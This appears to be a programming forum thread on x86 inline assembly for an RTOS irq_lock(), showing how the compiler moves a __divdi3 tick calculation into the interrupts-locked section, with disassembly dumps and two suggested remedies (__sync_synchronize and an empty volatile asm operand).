I'm working on the irq_lock() / irq_unlock() implementation for an RTOS and found an issue. We want to absolutely minimize how much time the CPU spends with interrupts locked. Right now, our irq_lock() inline function for x86 uses "memory" clobber:
static ALWAYS_INLINE unsigned int _do_irq_lock(void)
{
unsigned int key;
__asm__ volatile (
"pushfl;\n\t"
"cli;\n\t"
"popl %0;\n\t"
: "=g" (key)
:
: "memory"
);
return key;
}
The problem is that the compiler will still reorder potentially expensive operations into the critical section if they just touch registers and not memory. A specific example is here in our kernel's sleep function:
void k_sleep(int32_t duration)
{
__ASSERT(!_is_in_isr(), "");
__ASSERT(duration != K_FOREVER, "");
K_DEBUG("thread %p for %d ns\n", _current, duration);
/* wait of 0 ns is treated as a 'yield' */
if (duration == 0) {
k_yield();
return;
}
int32_t ticks = _TICK_ALIGN + _ms_to_ticks(duration);
int key = irq_lock();
_remove_thread_from_ready_q(_current);
_add_thread_timeout(_current, NULL, ticks);
_Swap(key);
}
The 'ticks' calculation, which does expensive math, gets reordered inside where we lock interrupts, so we are calling __divdi3 with interrupts locked which is not what we want:
Dump of assembler code for function k_sleep:
0x0010197a <+0>: push %ebp
0x0010197b <+1>: mov %esp,%ebp
0x0010197d <+3>: push %edi
0x0010197e <+4>: push %esi
0x0010197f <+5>: push %ebx
0x00101980 <+6>: mov 0x8(%ebp),%edi
0x00101983 <+9>: test %edi,%edi
0x00101985 <+11>: jne 0x101993 <k_sleep+25>
0x00101987 <+13>: lea -0xc(%ebp),%esp
0x0010198a <+16>: pop %ebx
0x0010198b <+17>: pop %esi
0x0010198c <+18>: pop %edi
0x0010198d <+19>: pop %ebp
0x0010198e <+20>: jmp 0x101944 <k_yield>
0x00101993 <+25>: pushf
0x00101994 <+26>: cli
0x00101995 <+27>: pop %esi
0x00101996 <+28>: pushl 0x104608
0x0010199c <+34>: call 0x101726 <_remove_thread_from_ready_q>
0x001019a1 <+39>: mov $0x64,%eax
0x001019a6 <+44>: imul %edi
0x001019a8 <+46>: mov 0x104608,%ebx
0x001019ae <+52>: add $0x3e7,%eax
0x001019b3 <+57>: adc $0x0,%edx
0x001019b6 <+60>: mov %ebx,0x20(%ebx)
0x001019b9 <+63>: movl $0x0,(%esp)
0x001019c0 <+70>: push $0x3e8
0x001019c5 <+75>: push %edx
0x001019c6 <+76>: push %eax
0x001019c7 <+77>: call 0x1000a0 <__divdi3>
0x001019cc <+82>: add $0x10,%esp
0x001019cf <+85>: inc %eax
0x001019d0 <+86>: mov %eax,0x28(%ebx)
0x001019d3 <+89>: movl $0x0,0x24(%ebx)
0x001019da <+96>: lea 0x18(%ebx),%edx
0x001019dd <+99>: mov $0x10460c,%eax
0x001019e2 <+104>: add $0x28,%ebx
0x001019e5 <+107>: mov $0x10162b,%ecx
0x001019ea <+112>: push %ebx
0x001019eb <+113>: call 0x101667 <sys_dlist_insert_at>
0x001019f0 <+118>: mov %esi,0x8(%ebp)
0x001019f3 <+121>: pop %eax
0x001019f4 <+122>: lea -0xc(%ebp),%esp
0x001019f7 <+125>: pop %ebx
0x001019f8 <+126>: pop %esi
0x001019f9 <+127>: pop %edi
0x001019fa <+128>: pop %ebp
0x001019fb <+129>: jmp 0x100f77 <_Swap>
End of assembler dump.
We discovered that we can get the ordering we want by declaring 'ticks' volatile:
Dump of assembler code for function k_sleep:
0x0010197a <+0>: push %ebp
0x0010197b <+1>: mov %esp,%ebp
0x0010197d <+3>: push %ebx
0x0010197e <+4>: push %edx
0x0010197f <+5>: mov 0x8(%ebp),%edx
0x00101982 <+8>: test %edx,%edx
0x00101984 <+10>: jne 0x10198d <k_sleep+19>
0x00101986 <+12>: call 0x101944 <k_yield>
0x0010198b <+17>: jmp 0x1019f5 <k_sleep+123>
0x0010198d <+19>: mov $0x64,%eax
0x00101992 <+24>: push $0x0
0x00101994 <+26>: imul %edx
0x00101996 <+28>: add $0x3e7,%eax
0x0010199b <+33>: push $0x3e8
0x001019a0 <+38>: adc $0x0,%edx
0x001019a3 <+41>: push %edx
0x001019a4 <+42>: push %eax
0x001019a5 <+43>: call 0x1000a0 <__divdi3>
0x001019aa <+48>: add $0x10,%esp
0x001019ad <+51>: inc %eax
0x001019ae <+52>: mov %eax,-0x8(%ebp)
0x001019b1 <+55>: pushf
0x001019b2 <+56>: cli
0x001019b3 <+57>: pop %ebx
0x001019b4 <+58>: pushl 0x1045e8
0x001019ba <+64>: call 0x101726 <_remove_thread_from_ready_q>
0x001019bf <+69>: mov 0x1045e8,%eax
0x001019c4 <+74>: mov -0x8(%ebp),%edx
0x001019c7 <+77>: movl $0x0,0x24(%eax)
0x001019ce <+84>: mov %edx,0x28(%eax)
0x001019d1 <+87>: mov %eax,0x20(%eax)
0x001019d4 <+90>: lea 0x18(%eax),%edx
0x001019d7 <+93>: add $0x28,%eax
0x001019da <+96>: mov %eax,(%esp)
0x001019dd <+99>: mov $0x10162b,%ecx
0x001019e2 <+104>: mov $0x1045ec,%eax
0x001019e7 <+109>: call 0x101667 <sys_dlist_insert_at>
0x001019ec <+114>: mov %ebx,(%esp)
0x001019ef <+117>: call 0x100f77 <_Swap>
0x001019f4 <+122>: pop %eax
0x001019f5 <+123>: mov -0x4(%ebp),%ebx
0x001019f8 <+126>: leave
0x001019f9 <+127>: ret
End of assembler dump.
However this just fixes it in one spot. We really need a way to modify the irq_lock() implementation such that it does the right thing everywhere, and right now the "memory" clobber is not sufficient.
Since your architecture is x86 anyway, try using __sync_synchronize instead of the memory clobber. It's a full hardware memory barrier supported by x86.
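A different technique from the barrier suggested above, sketched here as an assumption rather than a confirmed fix for this kernel: an empty asm statement that takes the value as a read-write register operand forces GCC to have computed the value before that statement. As far as I know GCC does not reorder volatile asm statements relative to each other, so placing it before the cli sequence should keep the arithmetic outside the locked region. The helper names are hypothetical, and the tick formula is only read off the disassembly above (multiply by 100, add 999, divide by 1000, add 1).

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical helper: the empty asm claims to read and modify `v`, so the
 * compiler must have finished computing it before this point. */
static inline int32_t force_computed(int32_t v)
{
    __asm__ volatile ("" : "+r" (v));
    return v;
}

/* Tick conversion as it appears in the disassembly of k_sleep(). */
int32_t sleep_ticks(int32_t duration_ms)
{
    assert(duration_ms >= 0);
    int64_t scaled = (int64_t)duration_ms * 100 + 999;   /* 64-bit to avoid overflow */
    int32_t ticks = force_computed(1 + (int32_t)(scaled / 1000));
    /* irq_lock() would be called here, after ticks has already been computed */
    return ticks;
}
```

Unlike declaring ticks volatile, this does not force a store to the stack, but it still has to be applied at each call site where an expensive value must be ready before the lock is taken.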
